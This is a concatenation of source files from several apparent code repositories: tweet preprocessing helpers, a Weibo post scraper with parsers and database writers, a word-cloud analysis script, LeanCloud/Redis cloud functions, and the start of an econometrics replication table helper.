# from emoji.unicode_codes import UNICODE_EMOJI
nltk.download("wordnet")
def preprocessing(text):
"""Exclude punctuations and digits from text."""
text = process_tweets(text)
text = text.lower()
exclude = string.punctuation + string.digits
for i in exclude:
text = text.replace(i, "")
return text
def process_tweets(text):
"""Exclude mentions, urls, and html reference characters in a string using regular expression"""
    text = re.sub(r"(@|https://)\S+", "", text)  # remove mentions and urls
text = re.sub(r"&[a-z]+;", "", text) # exclude html reference characters
return text
def lemmatize(text):
"""Lemmatize tweets by WordNetLemmatizer"""
lemma_list = []
lemmatizer = WordNetLemmatizer()
text = text.lower()
words = word_tokenize(text)
for word in words:
lemma = lemmatizer.lemmatize(word, "n")
if lemma == word:
lemma = lemmatizer.lemmatize(word, "v")
lemma_list.append(lemma)
return " ".join(lemma_list)
# def convert_emoji_to_text(tweet):
# """Convert emoji into text description in the tweet."""
# tokens = tweet.split()
# for i, token in enumerate(tokens):
# if token in UNICODE_EMOJI:
# emo_desc = demoji.findall(token)[token]
# new_rep = "_".join(emo_desc.split(":")[0].split())
# tokens[i] = new_rep
# return " ".join(tokens)
``` |
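A sketch of the cleaning pipeline above applied to one raw tweet, assuming the module is importable as `utils.preprocessing_helper` and that the NLTK wordnet and punkt data are available.
```python
from utils import preprocessing_helper as ph

raw = "@someone Got my 2nd dose at https://example.com &amp; feeling fine!"
cleaned = ph.preprocessing(raw)  # mentions, urls, html entities, punctuation and digits removed
print(cleaned)                   # roughly: 'got my nd dose at  feeling fine'
print(ph.lemmatize(cleaned))     # verbs reduced to their base form, e.g. 'got' -> 'get'
```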
{
"source": "jinjun1994/spider",
"score": 2
} |
#### File: weiboSpider/EDA/eda_api.py
```python
import re
import sys
import os
import os.path as osp
import json
import jieba
import jieba.analyse
# from scipy.misc import imread
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from wordcloud import WordCloud,ImageColorGenerator
from PIL import Image
pd.options.mode.chained_assignment = None
abspath = osp.abspath('')
plt.rcParams['font.sans-serif'] = ['Arial Unicode MS']
sns.set(font='Arial Unicode MS')  # make Seaborn display Chinese characters correctly
jieba.analyse.set_stop_words(f'{abspath}/weiboSpider/EDA/stopwords.txt')
# %%
# read the input csv path from the command line
fp = sys.argv[1]
print(f"{fp}")
bozhu = fp.split('/')[-2]
id = fp.split('/')[-1]
# output folder
# %%
# load the data
weibo = pd.read_csv(fp,error_bad_lines=False)
# https://github.com/pandas-dev/pandas/issues/11493
print("Weibo shape : ", weibo.shape)
weibo.head(1)
# %%
# 1-0 word cloud: extract keywords
content=' '.join(weibo['微博正文'].tolist())
key_words = jieba.analyse.extract_tags(content, topK=2000, withWeight=True,
allowPOS=('v','vd','n','nr','ns','nt','nz'))
key_words = {p[0]:p[1] for p in key_words}
# %%
# 1-1 draw the word cloud
# plot the word cloud image
def plot_pic(save_path, key_words):
wc.generate_from_frequencies(key_words)
wc.to_file(save_path)
# plt.figure()
plt.imshow(wc, interpolation='bilinear')
    plt.axis("off")  # hide the image axes
# plt.show()
wc = WordCloud(font_path='weiboSpider/EDA/KaiTi.ttf',
max_words=2000,
width=3840,
height=2106,
background_color="white",
margin=5)
plot_pic(f'weiboSpider/weibo/{bozhu}/{id}.png', key_words)
# 1. pass in a [(key, weight), ...] list to generate the word cloud
# # %%
# # 2-转评赞曲线图
# publish_data = pd.read_csv(fp, index_col="发布时间", parse_dates=True,error_bad_lines=False)[['点赞数','转发数','评论数']]
# # publish_data = pd.concat([pd.read_csv(fp1, index_col="发布时间", parse_dates=True), pd.read_csv(fp2, index_col="发布时间", parse_dates=True)])[['点赞数','转发数','评论数']]
# print(publish_data)
# avg_M_df = publish_data.resample('M').sum()
# avg_M_df.rename(columns={'点赞数': '月总点赞数', '转发数': '月总转发数', '评论数': '月总评论数'}, inplace=True)
# avg_M_df.index.name = f'{bozhu}老师发博时间'
# plt.figure(figsize=(15, 10))
# plt.title(f"{bozhu}老师 单月转评赞总数")
# sns_plot = sns.lineplot(data=avg_M_df)
# plt.savefig(f"weibo/{bozhu}/pic2.png", bbox_inches='tight', dpi=300)
# plt.show()
# # %%
# # 3 - counts of original vs. retweeted posts
# publish_data = pd.read_csv(fp, index_col="发布时间", parse_dates=True,error_bad_lines=False)[['是否为原创微博']].astype('int')
# yuanchuang = publish_data[publish_data['是否为原创微博'] == 1]
# zhuanfa = publish_data[publish_data['是否为原创微博'] == 0]
# yuanchuang.columns = ['原创']
# zhuanfa.columns = ['转发']
# zhuanfa['转发'] = zhuanfa['转发'].apply(lambda x: 1)
# yuanchuang = yuanchuang.resample('M').sum()
# zhuanfa = zhuanfa.resample('M').sum()
# df = pd.merge(yuanchuang['原创'], zhuanfa['转发'], how='left', on='发布时间').fillna(0).astype('int')
# df.rename(columns={'原创': '当月原创微博数', '转发': '当月转发微博数'}, inplace=True)
# plt.figure(figsize=(15,10))
# plt.title(f"{bozhu} 微博原创与转发量 => 干货满满")
# sns.lineplot(data=df)
# # plt.axhline(y=30, xmin=0.0, xmax=0.99, color='r', linestyle = "--", linewidth=3)
# plt.savefig(f"weibo/{bozhu}/pic3.png", bbox_inches='tight',dpi=300)
# plt.show()
# # %%
# # 4 - pie chart: publishing tools, original/retweet ratio
# publish_tool = pd.read_csv(fp,error_bad_lines=False)[['发布工具']]
# t = sum(publish_tool['发布工具'].value_counts()) * 0.008
# new_dict = {k:v for k,v in dict(publish_tool['发布工具'].value_counts()).items() if k.strip() != '无' and v > t}
# new_dict = {k:v/sum(new_dict.values()) for k,v in new_dict.items()}
# data = pd.Series(new_dict)
# plt.rcParams['figure.figsize'] = (8.0, 6.0) #调整图片大小
# lbs = data.index
# # explodes=[0.1 if i=='iPhone 8' else 0 for i in lbs]
# explodes=[0 for i in lbs]
# plt.pie(data, explode=explodes,labels=lbs, autopct="%1.1f%%",
# colors=sns.color_palette("muted"),startangle = 20,pctdistance = 0.6,
# textprops={'fontsize':10,'color':'black'})
# plt.title(f"{bozhu}老师最喜爱的微博交流工具")
# plt.axis('equal') # 设置x,y轴刻度一致,以使饼图成为圆形。
# plt.savefig(f"weibo/{bozhu}/pic4.png", dpi=300, bbox_inches='tight')
# plt.show()
```
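For reference, a small sketch of the keyword structure that feeds `generate_from_frequencies` above: `jieba.analyse.extract_tags(..., withWeight=True)` yields `(word, weight)` pairs (TF-IDF based weights), which the script converts into a dict. The toy sentence is illustrative only.
```python
import jieba.analyse

toy_text = "疫苗接种很顺利,大家都去接种疫苗"
pairs = jieba.analyse.extract_tags(toy_text, topK=5, withWeight=True)
key_words = {word: weight for word, weight in pairs}
print(key_words)  # e.g. {'疫苗': ..., '接种': ...}, ready for WordCloud.generate_from_frequencies
```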
#### File: node-weiboSpider/weiboSpider/html_parser.py
```python
import re
import sys
import traceback
from collections import OrderedDict
from datetime import datetime, timedelta
import requests
from lxml import etree
class Parser:
def __init__(self, config):
self.config = config
    def deal_html(self, url, cookie):
        """Fetch a page and return its parsed lxml selector"""
print("url:", url)
html = requests.get(url, cookies=cookie).content
selector = etree.HTML(html)
return selector
    def deal_garbled(self, info):
        """Normalize garbled text extracted from a node"""
info = (info.xpath('string(.)').replace(u'\u200b', '').encode(
sys.stdout.encoding, 'ignore').decode(sys.stdout.encoding))
return info
    def extract_picture_urls(self, info, weibo_id):
        """Extract the original picture urls of a weibo"""
try:
a_list = info.xpath('div/a/@href')
first_pic = 'https://weibo.cn/mblog/pic/' + weibo_id + '?rl=0'
all_pic = 'https://weibo.cn/mblog/picAll/' + weibo_id + '?rl=1'
if first_pic in a_list:
if all_pic in a_list:
selector = self.deal_html(all_pic, self.config['cookie'])
preview_picture_list = selector.xpath('//img/@src')
picture_list = [
p.replace('/thumb180/', '/large/')
for p in preview_picture_list
]
picture_urls = ','.join(picture_list)
else:
if info.xpath('.//img/@src'):
preview_picture = info.xpath('.//img/@src')[-1]
picture_urls = preview_picture.replace(
'/wap180/', '/large/')
else:
sys.exit(
u"爬虫微博可能被设置成了'不显示图片',请前往"
u"'https://weibo.cn/account/customize/pic',修改为'显示'"
)
else:
picture_urls = u'无'
return picture_urls
except Exception:
return u'无'
    def get_picture_urls(self, info, is_original):
        """Get the original picture urls of a weibo"""
try:
weibo_id = info.xpath('@id')[0][2:]
picture_urls = {}
if is_original:
original_pictures = self.extract_picture_urls(info, weibo_id)
picture_urls['original_pictures'] = original_pictures
if not self.config['filter']:
picture_urls['retweet_pictures'] = u'无'
else:
retweet_url = info.xpath("div/a[@class='cc']/@href")[0]
retweet_id = retweet_url.split('/')[-1].split('?')[0]
retweet_pictures = self.extract_picture_urls(info, retweet_id)
picture_urls['retweet_pictures'] = retweet_pictures
a_list = info.xpath('div[last()]/a/@href')
original_picture = u'无'
for a in a_list:
if a.endswith(('.gif', '.jpeg', '.jpg', '.png')):
original_picture = a
break
picture_urls['original_pictures'] = original_picture
return picture_urls
except Exception as e:
print('Error: ', e)
traceback.print_exc()
    def get_video_url(self, info, is_original):
        """Get the video url of a weibo"""
try:
if is_original:
div_first = info.xpath('div')[0]
a_list = div_first.xpath('.//a')
video_link = u'无'
for a in a_list:
if 'm.weibo.cn/s/video/show?object_id=' in a.xpath(
'@href')[0]:
video_link = a.xpath('@href')[0]
break
if video_link != u'无':
video_link = video_link.replace(
'm.weibo.cn/s/video/show', 'm.weibo.cn/s/video/object')
wb_info = requests.get(
video_link, cookies=self.config['cookie']).json()
video_url = wb_info['data']['object']['stream'].get(
'hd_url')
if not video_url:
video_url = wb_info['data']['object']['stream']['url']
                    if not video_url:  # the video is a live stream
video_url = u'无'
else:
video_url = u'无'
return video_url
except Exception:
return u'无'
    def get_page_num(self, selector):
        """Get the total number of weibo pages"""
if selector.xpath("//input[@name='mp']") == []:
page_num = 1
else:
page_num = (int)(
selector.xpath("//input[@name='mp']")[0].attrib['value'])
return page_num
    def get_long_weibo(self, weibo_link):
        """Get the full text of a long original weibo"""
selector = self.deal_html(weibo_link, self.config['cookie'])
info = selector.xpath("//div[@class='c']")[1]
wb_content = self.deal_garbled(info)
wb_time = info.xpath("//span[@class='ct']/text()")[0]
weibo_content = wb_content[wb_content.find(':') +
1:wb_content.rfind(wb_time)]
return weibo_content
    def get_original_weibo(self, info, weibo_id):
        """Get the content of an original weibo"""
weibo_content = self.deal_garbled(info)
weibo_content = weibo_content[:weibo_content.rfind(u'赞')]
a_text = info.xpath('div//a/text()')
if u'全文' in a_text:
weibo_link = 'https://weibo.cn/comment/' + weibo_id
wb_content = self.get_long_weibo(weibo_link)
if wb_content:
weibo_content = wb_content
return weibo_content
    def get_long_retweet(self, weibo_link):
        """Get the full text of a long retweeted weibo"""
wb_content = self.get_long_weibo(weibo_link)
weibo_content = wb_content[:wb_content.rfind(u'原文转发')]
return weibo_content
    def get_retweet(self, info, weibo_id):
        """Get the content of a retweeted weibo"""
wb_content = self.deal_garbled(info)
wb_content = wb_content[wb_content.find(':') +
1:wb_content.rfind(u'赞')]
wb_content = wb_content[:wb_content.rfind(u'赞')]
a_text = info.xpath('div//a/text()')
if u'全文' in a_text:
weibo_link = 'https://weibo.cn/comment/' + weibo_id
weibo_content = self.get_long_retweet(weibo_link)
if weibo_content:
wb_content = weibo_content
retweet_reason = self.deal_garbled(info.xpath('div')[-1])
retweet_reason = retweet_reason[:retweet_reason.rindex(u'赞')]
original_user = info.xpath("div/span[@class='cmt']/a/text()")
if original_user:
original_user = original_user[0]
wb_content = (retweet_reason + '\n' + u'原始用户: ' + original_user +
'\n' + u'转发内容: ' + wb_content)
else:
wb_content = retweet_reason + '\n' + u'转发内容: ' + wb_content
return wb_content
    def is_original(self, info):
        """Judge whether a weibo is original"""
is_original = info.xpath("div/span[@class='cmt']")
if len(is_original) > 3:
return False
else:
return True
    def get_weibo_content(self, info, is_original):
        """Get the weibo content"""
weibo_id = info.xpath('@id')[0][2:]
if is_original:
weibo_content = self.get_original_weibo(info, weibo_id)
else:
weibo_content = self.get_retweet(info, weibo_id)
return weibo_content
    def get_publish_place(self, info):
        """Get the publish place of a weibo"""
div_first = info.xpath('div')[0]
a_list = div_first.xpath('a')
publish_place = u'无'
for a in a_list:
if ('place.weibo.com' in a.xpath('@href')[0]
and a.xpath('text()')[0] == u'显示地图'):
weibo_a = div_first.xpath("span[@class='ctt']/a")
if len(weibo_a) >= 1:
publish_place = weibo_a[-1]
if (u'视频' == div_first.xpath("span[@class='ctt']/a/text()")
[-1][-2:]):
if len(weibo_a) >= 2:
publish_place = weibo_a[-2]
else:
publish_place = u'无'
publish_place = self.deal_garbled(publish_place)
break
return publish_place
    def get_publish_time(self, info):
        """Get the publish time of a weibo"""
try:
str_time = info.xpath("div/span[@class='ct']")
str_time = self.deal_garbled(str_time[0])
publish_time = str_time.split(u'来自')[0]
if u'刚刚' in publish_time:
publish_time = datetime.now().strftime('%Y-%m-%d %H:%M')
elif u'分钟' in publish_time:
minute = publish_time[:publish_time.find(u'分钟')]
minute = timedelta(minutes=int(minute))
publish_time = (datetime.now() -
minute).strftime('%Y-%m-%d %H:%M')
elif u'今天' in publish_time:
today = datetime.now().strftime('%Y-%m-%d')
time = publish_time[3:]
publish_time = today + ' ' + time
if len(publish_time) > 16:
publish_time = publish_time[:16]
elif u'月' in publish_time:
year = datetime.now().strftime('%Y')
month = publish_time[0:2]
day = publish_time[3:5]
time = publish_time[7:12]
publish_time = year + '-' + month + '-' + day + ' ' + time
else:
publish_time = publish_time[:16]
return publish_time
except Exception as e:
print('Error: ', e)
traceback.print_exc()
    def get_publish_tool(self, info):
        """Get the tool used to publish the weibo"""
try:
str_time = info.xpath("div/span[@class='ct']")
str_time = self.deal_garbled(str_time[0])
if len(str_time.split(u'来自')) > 1:
publish_tool = str_time.split(u'来自')[1]
else:
publish_tool = u'无'
return publish_tool
except Exception as e:
print('Error: ', e)
traceback.print_exc()
    def get_weibo_footer(self, info):
        """Get the like, retweet, and comment counts of a weibo"""
try:
footer = {}
pattern = r'\d+'
str_footer = info.xpath('div')[-1]
str_footer = self.deal_garbled(str_footer)
str_footer = str_footer[str_footer.rfind(u'赞'):]
weibo_footer = re.findall(pattern, str_footer, re.M)
up_num = int(weibo_footer[0])
footer['up_num'] = up_num
retweet_num = int(weibo_footer[1])
footer['retweet_num'] = retweet_num
comment_num = int(weibo_footer[2])
footer['comment_num'] = comment_num
return footer
except Exception as e:
print('Error: ', e)
traceback.print_exc()
    def get_one_weibo(self, info):
        """Get all the information of one weibo"""
try:
weibo = OrderedDict()
is_original = self.is_original(info)
if (not self.config['filter']) or is_original:
                weibo['id'] = info.xpath('@id')[0][2:]
                weibo['content'] = self.get_weibo_content(info, is_original)  # weibo text
                weibo['publish_place'] = self.get_publish_place(info)  # publish place
                weibo['publish_time'] = self.get_publish_time(info)  # publish time
                weibo['publish_tool'] = self.get_publish_tool(info)  # publish tool
                footer = self.get_weibo_footer(info)
                weibo['up_num'] = footer['up_num']  # like count
                weibo['retweet_num'] = footer['retweet_num']  # retweet count
                weibo['comment_num'] = footer['comment_num']  # comment count
                picture_urls = self.get_picture_urls(info, is_original)
                weibo['original_pictures'] = picture_urls['original_pictures']  # original picture urls
                if not self.config['filter']:
                    weibo['retweet_pictures'] = picture_urls['retweet_pictures']  # retweeted weibo picture urls
                weibo['original'] = is_original  # whether the weibo is original
                weibo['video_url'] = self.get_video_url(info, is_original)  # weibo video url
else:
weibo = None
return weibo
except Exception as e:
print('Error: ', e)
traceback.print_exc()
    def is_pinned_weibo(self, info):
        """Judge whether a weibo is pinned"""
kt = info.xpath(".//span[@class='kt']/text()")
if kt and kt[0] == u'置顶':
return True
else:
return False
```
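As an illustration of the timestamp normalization in `get_publish_time` above, here is a standalone sketch of just the 'N分钟' (N minutes ago) branch; the '刚刚', '今天' and 'M月D日' branches follow the same pattern of rewriting relative times into 'YYYY-MM-DD HH:MM' strings.
```python
from datetime import datetime, timedelta

def minutes_ago_to_timestamp(publish_time):
    # mirrors the '分钟' branch of Parser.get_publish_time
    minutes = int(publish_time[:publish_time.find(u'分钟')])
    return (datetime.now() - timedelta(minutes=minutes)).strftime('%Y-%m-%d %H:%M')

print(minutes_ago_to_timestamp(u'5分钟前'))  # an absolute timestamp five minutes in the past
```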
#### File: node-weiboSpider/weiboSpider/validator.py
```python
from datetime import datetime
import sys
def is_date(since_date):
    """Check whether the date string is in a valid yyyy-mm-dd format"""
try:
datetime.strptime(since_date, "%Y-%m-%d")
return True
except:
return False
class Validator:
def __init__(self, config):
"""
        self.user_id_list = ''  # 1. a list of user ids, e.g. the id of "Dear-迪丽热巴" is '1669879400'; 2. the name of a file storing the user id list
        self.since_date = since_date  # 1. start date: crawl weibo published from this date until now, in yyyy-mm-dd form; 2. an integer number of days before today
        self.filter = filter  # 0 or 1, default 0; 0 crawls all of the user's weibo, 1 crawls only original weibo
        self.mongodb_write = mongodb_write  # 0 means do not write results to MongoDB, 1 means write them
        self.mysql_write = mysql_write  # 0 means do not write results to MySQL, 1 means write them
        self.pic_download = pic_download  # 0 or 1, default 0; 0 does not download original pictures, 1 downloads them
        self.video_download = video_download  # 0 or 1, default 0; 0 does not download weibo videos, 1 downloads them
        self.mysql_config = {
        }  # MySQL connection settings; optional, only needed when the MySQL user name, password, etc. differ from the program defaults
"""
self.config = config
def validate(self):
bool_config = ["filter", "pic_download", "video_download"]
date_config = ["since_date"]
for key in bool_config:
if self.config[key] not in [0, 1]:
sys.exit("%s值应为0或1,请重新输入" % key)
for key in date_config:
if not (type(self.config[key]) == type(0)
or is_date(self.config[key])):
sys.exit("%s值应为yyyy-mm-dd形式或整数,请重新输入" % key)
for mode in self.config['write_mode']:
if mode not in ['txt', 'csv', 'mysql', 'mongo']:
sys.exit("write_mode值应为txt,csv,mysql,mongo,请重新输入")
```
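A sketch of a config dict that passes `Validator.validate()` above. The field names follow the `__init__` docstring, the sample user id comes from that docstring, and the remaining values are illustrative; the import path is an assumption about the package layout.
```python
from weiboSpider.validator import Validator  # import path is an assumption

config = {
    "user_id_list": ["1669879400"],  # or the name of a file containing one id per line
    "since_date": "2020-01-01",      # or an integer number of days before today
    "filter": 1,                     # 1 = only original weibo
    "pic_download": 0,
    "video_download": 0,
    "write_mode": ["csv", "txt"],
    "mysql_config": {},
}
Validator(config).validate()  # exits with a message if any checked value is invalid
```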
#### File: node-weiboSpider/weiboSpider/writer.py
```python
import copy
import csv
import os
import sys
import traceback
def get_filepath(type, nickname):
    """Build the path of the result file"""
file_dir = os.path.split(
os.path.realpath(__file__))[0] + os.sep + 'weibo' + os.sep + nickname
if type == 'img' or type == 'video':
file_dir = file_dir + os.sep + type
if not os.path.isdir(file_dir):
os.makedirs(file_dir)
if type == 'img' or type == 'video':
return file_dir
file_path = file_dir + os.sep + nickname + '.' + type
return file_path
def write_log(since_date):
    """Write a note to log.txt when the program stops because the cookie has expired"""
file_dir = os.path.split(
os.path.realpath(__file__))[0] + os.sep + 'weibo' + os.sep
if not os.path.isdir(file_dir):
os.makedirs(file_dir)
file_path = file_dir + 'log.txt'
content = u'cookie已过期,从%s到今天的微博获取失败,请重新设置cookie\n' % since_date
with open(file_path, 'ab') as f:
f.write(content.encode(sys.stdout.encoding))
class Writer:
def __init__(self, config):
write_mode = config['write_mode']
self.writers = []
if 'txt' in write_mode:
self.writers.append(TxtWriter(config))
if 'csv' in write_mode:
self.writers.append(CsvWriter(config))
if 'mysql' in write_mode:
self.writers.append(MysqlWriter(config))
if 'mongo' in write_mode:
self.writers.append(MongoWriter(config))
def write_user(self, user):
for writer in self.writers:
if isinstance(writer, MongoWriter):
writer.write_user(copy.deepcopy(user))
else:
writer.write_user(user)
def write_weibo(self, weibo):
for writer in self.writers:
if isinstance(writer, MongoWriter) or isinstance(
writer, MysqlWriter):
writer.write_weibo(copy.deepcopy(weibo))
else:
writer.write_weibo(weibo)
class TxtWriter:
def __init__(self, config):
self.config = config
def write_user(self, user):
self.user = user
if self.config['filter']:
result_header = u'\n\n原创微博内容: \n'
else:
result_header = u'\n\n微博内容: \n'
result_header = (u'用户信息\n用户昵称:' + user['nickname'] + u'\n用户id: ' +
str(user['id']) + u'\n微博数: ' +
str(user['weibo_num']) + u'\n关注数: ' +
str(user['following']) + u'\n粉丝数: ' +
str(user['followers']) + result_header)
with open(get_filepath('txt', user['nickname']), 'ab') as f:
f.write(result_header.encode(sys.stdout.encoding))
    def write_weibo(self, weibo):
        """Write the scraped weibo records to a txt file"""
temp_result = []
for w in weibo:
temp_result.append(w['content'] + '\n' + u'微博位置: ' +
w['publish_place'] + '\n' + u'发布时间: ' +
w['publish_time'] + '\n' + u'点赞数: ' +
str(w['up_num']) + u' 转发数: ' +
str(w['retweet_num']) + u' 评论数: ' +
str(w['comment_num']) + '\n' + u'发布工具: ' +
w['publish_tool'] + '\n\n')
result = ''.join(temp_result)
with open(get_filepath('txt', self.user['nickname']), 'ab') as f:
f.write(result.encode(sys.stdout.encoding))
print(u'%d条微博写入txt文件完毕,保存路径:' % len(weibo))
print(get_filepath('txt', self.user['nickname']))
class CsvWriter:
def __init__(self, config):
self.config = config
def write_user(self, user):
self.user = user
result_headers = [
'微博id',
'微博正文',
'发布位置',
'发布时间',
'发布工具',
'点赞数',
'转发数',
'评论数',
'原始图片url',
'微博视频url',
]
if not self.config['filter']:
result_headers.insert(-1, '被转发微博原始图片url')
result_headers.insert(-1, '是否为原创微博')
if sys.version < '3': # python2.x
reload(sys)
sys.setdefaultencoding('utf-8')
with open(get_filepath('csv', self.user['nickname']), 'ab') as f:
csv_writer = csv.writer(f)
csv_writer.writerows([result_headers])
else: # python3.x
with open(get_filepath('csv', self.user['nickname']),
'a',
encoding='utf-8-sig',
newline='') as f:
csv_writer = csv.writer(f)
csv_writer.writerows([result_headers])
    def write_weibo(self, weibo):
        """Write the scraped weibo records to a csv file"""
result_data = [w.values() for w in weibo]
if sys.version < '3': # python2.x
reload(sys)
sys.setdefaultencoding('utf-8')
with open(get_filepath('csv', self.user['nickname']), 'ab') as f:
csv_writer = csv.writer(f)
csv_writer.writerows(result_data)
else: # python3.x
with open(get_filepath('csv', self.user['nickname']),
'a',
encoding='utf-8-sig',
newline='') as f:
csv_writer = csv.writer(f)
csv_writer.writerows(result_data)
print(u'%d条微博写入csv文件完毕,保存路径:' % len(weibo))
print(get_filepath('csv', self.user['nickname']))
class MongoWriter:
def __init__(self, config):
self.config = config
    def info_to_mongodb(self, collection, info_list):
        """Write the scraped records into the MongoDB database"""
try:
import pymongo
from pymongo import MongoClient
except ImportError:
sys.exit(u'系统中可能没有安装pymongo库,请先运行 pip install pymongo ,再运行程序')
try:
client = MongoClient()
except pymongo.errors.ServerSelectionTimeoutError:
sys.exit(u'系统中可能没有安装或启动MongoDB数据库,请先根据系统环境安装或启动MongoDB,再运行程序')
db = client['weibo']
collection = db[collection]
for info in info_list:
if not collection.find_one({'id': info['id']}):
collection.insert_one(info)
else:
collection.update_one({'id': info['id']}, {'$set': info})
    def write_user(self, user):
        """Write the scraped user info into the MongoDB database"""
self.user = user
user_list = [user]
self.info_to_mongodb('user', user_list)
print(u'%s信息写入MongoDB数据库完毕' % user['nickname'])
    def write_weibo(self, weibo):
        """Write the scraped weibo into the MongoDB database"""
weibo_list = []
for w in weibo:
w['user_id'] = self.user['id']
weibo_list.append(w)
self.info_to_mongodb('weibo', weibo_list)
print(u'%d条微博写入MongoDB数据库完毕' % len(weibo))
class MysqlWriter:
def __init__(self, config):
self.config = config
    def write_user(self, user):
        """Write the scraped user info into the MySQL database"""
        self.user = user
        # create the 'weibo' database
create_database = """CREATE DATABASE IF NOT EXISTS weibo DEFAULT
CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci"""
self.mysql_create_database(create_database)
        # create the 'user' table
create_table = """
CREATE TABLE IF NOT EXISTS user (
id varchar(12) NOT NULL,
nickname varchar(30),
weibo_num INT,
following INT,
followers INT,
PRIMARY KEY (id)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4"""
self.mysql_create_table(create_table)
self.mysql_insert('user', [user])
print(u'%s信息写入MySQL数据库完毕' % user['nickname'])
    def write_weibo(self, weibo):
        """Write the scraped weibo into the MySQL database"""
        # create the 'weibo' table
create_table = """
CREATE TABLE IF NOT EXISTS weibo (
id varchar(10) NOT NULL,
user_id varchar(12),
content varchar(2000),
original_pictures varchar(1000),
retweet_pictures varchar(1000),
original BOOLEAN NOT NULL DEFAULT 1,
video_url varchar(300),
publish_place varchar(100),
publish_time DATETIME NOT NULL,
publish_tool varchar(30),
up_num INT NOT NULL,
retweet_num INT NOT NULL,
comment_num INT NOT NULL,
PRIMARY KEY (id)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4"""
self.mysql_create_table(create_table)
        # insert or update weibo rows in the 'weibo' table
weibo_list = []
for w in weibo:
w['user_id'] = self.user['id']
weibo_list.append(w)
self.mysql_insert('weibo', weibo_list)
print(u'%d条微博写入MySQL数据库完毕' % len(weibo))
    def mysql_create(self, connection, sql):
        """Create a MySQL database or table"""
try:
with connection.cursor() as cursor:
cursor.execute(sql)
finally:
connection.close()
    def mysql_create_database(self, sql):
        """Create the MySQL database"""
try:
import pymysql
except ImportError:
sys.exit(u'系统中可能没有安装pymysql库,请先运行 pip install pymysql ,再运行程序')
mysql_config = self.config['mysql_config']
try:
connection = pymysql.connect(**mysql_config)
except pymysql.err.OperationalError:
sys.exit(u'系统中可能没有安装或启动MySQL数据库或配置错误,请先根据系统环境安装或启动MySQL,再运行程序')
self.mysql_create(connection, sql)
    def mysql_create_table(self, sql):
        """Create a MySQL table"""
import pymysql
mysql_config = self.config['mysql_config']
mysql_config['db'] = 'weibo'
connection = pymysql.connect(**mysql_config)
self.mysql_create(connection, sql)
    def mysql_insert(self, table, data_list):
        """Insert or update rows in a MySQL table"""
import pymysql
mysql_config = self.config['mysql_config']
if len(data_list) > 0:
keys = ', '.join(data_list[0].keys())
values = ', '.join(['%s'] * len(data_list[0]))
mysql_config['db'] = 'weibo'
connection = pymysql.connect(**mysql_config)
cursor = connection.cursor()
sql = """INSERT INTO {table}({keys}) VALUES ({values}) ON
DUPLICATE KEY UPDATE""".format(table=table,
keys=keys,
values=values)
update = ','.join([
" {key} = values({key})".format(key=key)
for key in data_list[0]
])
sql += update
try:
cursor.executemany(
sql, [tuple(data.values()) for data in data_list])
connection.commit()
except Exception as e:
connection.rollback()
print('Error: ', e)
traceback.print_exc()
finally:
connection.close()
``` |
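To make the upsert built by `MysqlWriter.mysql_insert` above concrete, here is a self-contained sketch of the same string construction for a single user row; the column names mirror the user dict used by `write_user`, and the sample values are made up.
```python
data_list = [{"id": "1669879400", "nickname": "example_user", "weibo_num": 120,
              "following": 15, "followers": 3000}]
keys = ', '.join(data_list[0].keys())
values = ', '.join(['%s'] * len(data_list[0]))
sql = """INSERT INTO {table}({keys}) VALUES ({values}) ON
            DUPLICATE KEY UPDATE""".format(table='user', keys=keys, values=values)
sql += ','.join([" {key} = values({key})".format(key=key) for key in data_list[0]])
print(sql)
# INSERT INTO user(id, nickname, weibo_num, following, followers) VALUES (%s, %s, %s, %s, %s) ON
#             DUPLICATE KEY UPDATE id = values(id), nickname = values(nickname), ...
```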
{
"source": "jinjunnn/cloud1",
"score": 3
} |
#### File: jinjunnn/cloud1/cloud.py
```python
from leancloud import Engine
from leancloud import LeanEngineError
engine = Engine()
import os
import redis
r = redis.from_url(os.environ.get("REDIS_URL_impharaon"))
@engine.define
def write_users(**params):
    # filter out keys whose values are empty
data_info = params
for key in list(data_info.keys()):
if not data_info.get(key):
data_info.pop(key)
result = r.hmset(params['id'],data_info)
#12345
print(result)
@engine.define
def write_users_sent_message_times(**params):
r.hmset('test','key','value')
# delete all keys in redis
@engine.define
def del_all_redis_key():
keys = r.keys('*')
for item in keys:
r.delete(item)
@engine.before_save('Todo')
def before_todo_save(todo):
content = todo.get('content')
if not content:
raise LeanEngineError('Content cannot be empty!')
if len(content) >= 240:
todo.set('content', content[:240] + ' ...')
``` |
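A sketch of what `write_users` above leaves in Redis and how to inspect it, assuming a local Redis instance; the payload is illustrative, and `hmset` is kept to match the cloud function even though newer redis-py versions prefer `hset(name, mapping=...)`.
```python
import redis

r = redis.Redis()  # local instance for illustration
params = {"id": "user:42", "name": "alice", "city": "", "score": 7}
data_info = {k: v for k, v in params.items() if v}  # same empty-value filtering as write_users
r.hmset(params["id"], data_info)
print(r.hgetall("user:42"))  # {b'id': b'user:42', b'name': b'alice', b'score': b'7'}
```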
{
"source": "jinju-rhee/microeconometrics_replication",
"score": 2
} |
#### File: microeconometrics_replication/auxiliary/auxiliary_tables.py
```python
from localreg import *
import pandas as pd
import numpy as np
import econtools
import econtools.metrics as mt
from auxiliary.auxiliary_subset import *
from auxiliary.auxiliary_tables import *
##===============================
## For descriptive statistics table
def descriptive_main(data):
variables = data[["tk","ab","dist1","ecs1"]]
table = pd.DataFrame()
mean = variables.mean()
table['Mean'] = mean.round(2)
table['Standard Deviation'] = variables.std()
table = table.astype(float).round(2)
table['Variable'] = ["Capital transfers","Alignment","Regional incumbent’s bloc vote margin (v)", "Regional seat margin"]
table = table.set_index('Variable')
table['RDD frame'] = ["outcome variable","treatment","forcing variable","heterogeneity effects"]
table['Definition'] = ["Capital transfers from the Regional government per capita",
"Dummy equal to one if the party of the mayor is the same as that of the president of the AC",
"% of votes cast at the local elections that have to be added (subtracted from) to the ideological bloc of the Regional incumbent to win (lose) a majority of seats in the local council",
"Difference between the seat share of the parties in the regional government and the seat share of the main opposition parties in the previous regional election. This variable is demeaned. "]
table.style.set_properties(subset= ['Definition'], **{'width-min': '300px'})
return(table)
def descriptive_controls(data):
variables = data[["debt","tipo","vcp","pob","density","pob_mes6591","pob_5_1491",
"extr_noeu91","unempl","income","educ2","presscirc","regre",
"regde","meanden","regterm"]]
table = pd.DataFrame()
mean = variables.mean()
table['Mean'] = mean.round(2)
